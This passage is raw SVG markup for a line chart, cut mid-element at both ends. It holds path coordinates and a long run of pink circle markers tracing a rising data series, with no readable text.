253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.67094624 L 173.81669637551994 253.67094624 L 175.79233511586455 253.67094624 L 177.76797385620918 253.67094624 L 179.74361259655382 253.59960178285715 L 181.71925133689842 253.59960178285715 L 183.69489007724306 253.59960178285715 L 185.67052881758767 253.59960178285715 L 187.6461675579323 253.59960178285715 L 189.6218062982769 253.59960178285715 L 191.59744503862154 253.59960178285715 L 193.57308377896615 253.59960178285715 L 195.5487225193108 253.59960178285715 L 197.52436125965542 253.59960178285715 L 199.50000000000003 253.59960178285715 L 201.47563874034466 251.81852749714284 L 203.45127748068927 251.81852749714284 L 205.4269162210339 251.81852749714284 L 207.4025549613785 249.76778537142857 L 209.37819370172315 249.76778537142857 L 211.35383244206778 249.76778537142857 L 213.3294711824124 247.78257257142857 L 215.30510992275703 244.52000982857143 L 217.28074866310163 242.13382697142856 L 219.25638740344627 238.89922354285716 L 221.23202614379088 236.19970354285715 L 223.2076648841355 232.00580639999998 L 225.18330362448012 229.18369165714284 L 227.15894236482475 229.18369165714284 L 229.1345811051694 229.18369165714284 L 231.110219845514 225.49138765714287 L 233.08585858585863 222.84007337142856 L 235.06149732620324 222.84007337142856 L 237.03713606654787 222.84007337142856 L 239.01277480689248 222.84007337142856 L 240.98841354723712 222.84007337142856 L 242.96405228758175 222.84007337142856 L 244.93969102792636 222.84007337142856 L 246.915329768271 222.84007337142856 L 248.8909685086156 222.84007337142856 L 250.86660724896024 222.84007337142856 L 252.84224598930484 222.84007337142856 L 254.81788472964945 222.84007337142856 L 256.79352346999406 222.84007337142856 L 258.7691622103387 222.84007337142856 L 260.7448009506833 222.84007337142856 L 262.72043969102793 222.84007337142856 L 264.69607843137254 222.84007337142856 L 266.6717171717172 222.84007337142856 L 268.6473559120618 222.84007337142856 L 270.6229946524064 222.84007337142856 L 272.598633392751 222.84007337142856 L 274.5742721330957 222.84007337142856 L 276.5499108734403 222.84007337142856 L 278.5255496137849 222.84007337142856 L 280.50118835412957 222.84007337142856 L 282.4768270944742 222.84007337142856 L 284.4524658348188 222.84007337142856 L 286.4281045751634 222.84007337142856 L 288.40374331550805 222.84007337142856 L 290.37938205585266 222.3233081142857 L 292.35502079619727 218.68215291428572 L 294.33065953654193 216.05976205714285 L 296.30629827688654 216.05976205714285 L 298.28193701723114 216.05976205714285 L 300.25757575757575 216.05976205714285 L 302.2332144979204 216.05976205714285 L 304.208853238265 216.05976205714285 L 306.1844919786096 216.05976205714285 L 308.1601307189543 216.05976205714285 L 310.1357694592989 216.05976205714285 L 312.1114081996435 216.05976205714285 L 314.0870469399881 216.05976205714285 L 316.0626856803328 214.66358925714286 L 318.0383244206774 212.95023977142858 L 320.013963161022 212.11670377142858 L 321.98960190136665 210.39279977142857 L 323.96524064171126 208.80962262857142 L 325.94087938205587 208.14216236190396 L 327.9165181224005 206.58029721904683 L 329.89215686274514 204.08420533333253 L 331.86779560308975 204.08420533333253 L 333.84343434343435 204.08420533333253 L 335.81907308377896 204.08420533333253 L 337.7947118241236 204.08420533333253 L 339.77035056446823 204.08420533333253 L 341.74598930481284 204.08420533333253 L 343.7216280451575 204.08420533333253 L 345.6972667855021 204.08420533333253 L 347.6729055258467 204.08420533333253 L 349.6485442661913 204.08420533333253 L 351.624183006536 204.08420533333253 L 353.5998217468806 204.08420533333253 L 355.5754604872252 204.08420533333253 L 357.55109922756986 203.41437481142773 L 359.52673796791447 202.979001097142 L 361.5023767082591 202.91611378285629 L 363.4780154486037 202.78322951618966 L 365.45365418894835 202.78322951618966 L 367.42929292929296 202.78322951618966 L 369.40493166963756 202.78322951618966 L 371.3805704099822 202.78322951618966 L 373.35620915032683 202.78322951618966 L 375.33184789067144 202.78322951618966 L 377.30748663101605 202.78322951618966 L 379.2831253713607 202.78322951618966 L 381.2587641117053 202.71848163047542 L 383.2344028520499 202.66020853333254 L 385.2100415923946 202.21285950476113 L 387.1856803327392 201.68117584761825 L 389.1613190730838 201.0676947047611 L 391.1369578134284 200.80870316190396 L 393.1125965537731 200.71225113904683 L 395.0882352941177 200.56906156190382" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.67094624 L 173.81669637551994 253.67094624 L 175.79233511586455 253.67094624 L 177.76797385620918 253.67094624 L 179.74361259655382 253.59960178285715 L 181.71925133689842 253.59960178285715 L 183.69489007724306 253.59960178285715 L 185.67052881758767 253.59960178285715 L 187.6461675579323 253.59960178285715 L 189.6218062982769 253.59960178285715 L 191.59744503862154 253.59960178285715 L 193.57308377896615 253.59960178285715 L 195.5487225193108 253.59960178285715 L 197.52436125965542 253.59960178285715 L 199.50000000000003 253.59960178285715 L 201.47563874034466 251.81852749714284 L 203.45127748068927 251.81852749714284 L 205.4269162210339 251.81852749714284 L 207.4025549613785 249.76778537142857 L 209.37819370172315 249.76778537142857 L 211.35383244206778 249.76778537142857 L 213.3294711824124 247.78257257142857 L 215.30510992275703 244.52000982857143 L 217.28074866310163 242.13382697142856 L 219.25638740344627 238.89922354285716 L 221.23202614379088 236.19970354285715 L 223.2076648841355 232.00580639999998 L 225.18330362448012 229.18369165714284 L 227.15894236482475 229.18369165714284 L 229.1345811051694 229.18369165714284 L 231.110219845514 225.49138765714287 L 233.08585858585863 222.84007337142856 L 235.06149732620324 222.84007337142856 L 237.03713606654787 222.84007337142856 L 239.01277480689248 222.84007337142856 L 240.98841354723712 222.84007337142856 L 242.96405228758175 222.84007337142856 L 244.93969102792636 222.84007337142856 L 246.915329768271 222.84007337142856 L 248.8909685086156 222.84007337142856 L 250.86660724896024 222.84007337142856 L 252.84224598930484 222.84007337142856 L 254.81788472964945 222.84007337142856 L 256.79352346999406 222.84007337142856 L 258.7691622103387 222.84007337142856 L 260.7448009506833 222.84007337142856 L 262.72043969102793 222.84007337142856 L 264.69607843137254 222.84007337142856 L 266.6717171717172 222.84007337142856 L 268.6473559120618 222.84007337142856 L 270.6229946524064 222.84007337142856 L 272.598633392751 222.84007337142856 L 274.5742721330957 222.84007337142856 L 276.5499108734403 222.84007337142856 L 278.5255496137849 222.84007337142856 L 280.50118835412957 222.84007337142856 L 282.4768270944742 222.84007337142856 L 284.4524658348188 222.84007337142856 L 286.4281045751634 222.84007337142856 L 288.40374331550805 222.84007337142856 L 290.37938205585266 222.3233081142857 L 292.35502079619727 218.68215291428572 L 294.33065953654193 216.05976205714285 L 296.30629827688654 216.05976205714285 L 298.28193701723114 216.05976205714285 L 300.25757575757575 216.05976205714285 L 302.2332144979204 216.05976205714285 L 304.208853238265 216.05976205714285 L 306.1844919786096 216.05976205714285 L 308.1601307189543 216.05976205714285 L 310.1357694592989 216.05976205714285 L 312.1114081996435 216.05976205714285 L 314.0870469399881 216.05976205714285 L 316.0626856803328 214.66358925714286 L 318.0383244206774 212.95023977142858 L 320.013963161022 212.11670377142858 L 321.98960190136665 210.39279977142857 L 323.96524064171126 208.80962262857142 L 325.94087938205587 208.14216236190396 L 327.9165181224005 206.58029721904683 L 329.89215686274514 204.08420533333253 L 331.86779560308975 204.08420533333253 L 333.84343434343435 204.08420533333253 L 335.81907308377896 204.08420533333253 L 337.7947118241236 204.08420533333253 L 339.77035056446823 204.08420533333253 L 341.74598930481284 204.08420533333253 L 343.7216280451575 204.08420533333253 L 345.6972667855021 204.08420533333253 L 347.6729055258467 204.08420533333253 L 349.6485442661913 204.08420533333253 L 351.624183006536 204.08420533333253 L 353.5998217468806 204.08420533333253 L 355.5754604872252 204.08420533333253 L 357.55109922756986 203.41437481142773 L 359.52673796791447 202.979001097142 L 361.5023767082591 202.91611378285629 L 363.4780154486037 202.78322951618966 L 365.45365418894835 202.78322951618966 L 367.42929292929296 202.78322951618966 L 369.40493166963756 202.78322951618966 L 371.3805704099822 202.78322951618966 L 373.35620915032683 202.78322951618966 L 375.33184789067144 202.78322951618966 L 377.30748663101605 202.78322951618966 L 379.2831253713607 202.78322951618966 L 381.2587641117053 202.71848163047542 L 383.2344028520499 202.66020853333254 L 385.2100415923946 202.21285950476113 L 387.1856803327392 201.68117584761825 L 389.1613190730838 201.0676947047611 L 391.1369578134284 200.80870316190396 L 393.1125965537731 200.71225113904683 L 395.0882352941177 200.56906156190382" fill="none" stroke="#ff0066" stroke-width="2"></path><circle cx="395.0882352941177" cy="200.56906156190382" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="393.1125965537731" cy="200.71225113904683" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="391.1369578134284" cy="200.80870316190396" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="389.1613190730838" cy="201.0676947047611" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="387.1856803327392" cy="201.68117584761825" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="385.2100415923946" cy="202.21285950476113" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="383.2344028520499" cy="202.66020853333254" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="381.2587641117053" cy="202.71848163047542" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="379.2831253713607" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="377.30748663101605" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="375.33184789067144" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="373.35620915032683" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="371.3805704099822" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="369.40493166963756" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="367.42929292929296" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="365.45365418894835" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="363.4780154486037" cy="202.78322951618966" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="361.5023767082591" cy="202.91611378285629" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="359.52673796791447" cy="202.979001097142" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="357.55109922756986" cy="203.41437481142773" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="355.5754604872252" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="353.5998217468806" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="351.624183006536" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="349.6485442661913" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="347.6729055258467" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="345.6972667855021" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="343.7216280451575" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="341.74598930481284" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="339.77035056446823" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="337.7947118241236" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="335.81907308377896" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="333.84343434343435" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="331.86779560308975" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="329.89215686274514" cy="204.08420533333253" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="327.9165181224005" cy="206.58029721904683" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="325.94087938205587" cy="208.14216236190396" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="323.96524064171126" cy="208.80962262857142" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="321.98960190136665" cy="210.39279977142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="320.013963161022" cy="212.11670377142858" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="318.0383244206774" cy="212.95023977142858" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="316.0626856803328" cy="214.66358925714286" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="314.0870469399881" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="312.1114081996435" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="310.1357694592989" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="308.1601307189543" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="306.1844919786096" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="304.208853238265" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="302.2332144979204" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="300.25757575757575" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="298.28193701723114" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="296.30629827688654" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="294.33065953654193" cy="216.05976205714285" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="292.35502079619727" cy="218.68215291428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="290.37938205585266" cy="222.3233081142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="288.40374331550805" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="286.4281045751634" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="284.4524658348188" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="282.4768270944742" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="280.50118835412957" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="278.5255496137849" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="276.5499108734403" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="274.5742721330957" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="272.598633392751" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="270.6229946524064" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="268.6473559120618" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="266.6717171717172" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="264.69607843137254" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="262.72043969102793" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="260.7448009506833" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="258.7691622103387" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="256.79352346999406" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="254.81788472964945" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="252.84224598930484" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="250.86660724896024" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="248.8909685086156" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="246.915329768271" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="244.93969102792636" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="242.96405228758175" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="240.98841354723712" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="239.01277480689248" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="237.03713606654787" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="235.06149732620324" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="233.08585858585863" cy="222.84007337142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="231.110219845514" cy="225.49138765714287" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="229.1345811051694" cy="229.18369165714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="227.15894236482475" cy="229.18369165714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="225.18330362448012" cy="229.18369165714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="223.2076648841355" cy="232.00580639999998" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="221.23202614379088" cy="236.19970354285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="219.25638740344627" cy="238.89922354285716" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="217.28074866310163" cy="242.13382697142856" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="215.30510992275703" cy="244.52000982857143" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="213.3294711824124" cy="247.78257257142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="211.35383244206778" cy="249.76778537142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="209.37819370172315" cy="249.76778537142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="207.4025549613785" cy="249.76778537142857" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="205.4269162210339" cy="251.81852749714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="203.45127748068927" cy="251.81852749714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="201.47563874034466" cy="251.81852749714284" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="199.50000000000003" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="197.52436125965542" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="195.5487225193108" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="193.57308377896615" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="191.59744503862154" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="189.6218062982769" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="187.6461675579323" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="185.67052881758767" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="183.69489007724306" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="181.71925133689842" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="179.74361259655382" cy="253.59960178285715" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="177.76797385620918" cy="253.67094624" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="175.79233511586455" cy="253.67094624" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="173.81669637551994" cy="253.67094624" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="171.8410576351753" cy="253.67094624" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="169.8654188948307" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="167.88978015448606" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="165.91414141414145" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="163.93850267379682" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="161.96286393345218" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="159.98722519310758" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="158.01158645276294" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="156.03594771241833" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="154.0603089720737" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="152.0846702317291" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="150.10903149138446" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="148.13339275103985" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="146.15775401069521" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="144.18211527035058" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="142.20647653000597" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="140.23083778966134" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="138.25519904931673" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="136.2795603089721" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="134.3039215686275" cy="253.71428571428572" r="4" stroke="#333" 